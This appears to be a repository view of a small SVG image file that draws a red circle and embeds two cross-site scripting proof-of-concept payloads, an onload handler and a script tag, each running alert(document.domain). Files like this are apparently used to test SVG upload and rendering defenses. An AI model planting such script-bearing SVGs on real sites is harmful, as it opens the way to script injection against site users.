File size: 229 Bytes
56315b9 | 1 2 3 4 5 6 | <?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)" viewBox="0 0 100 100">
<circle cx="50" cy="50" r="40" fill="red"/>
<script>alert(document.domain)</script>
</svg>
|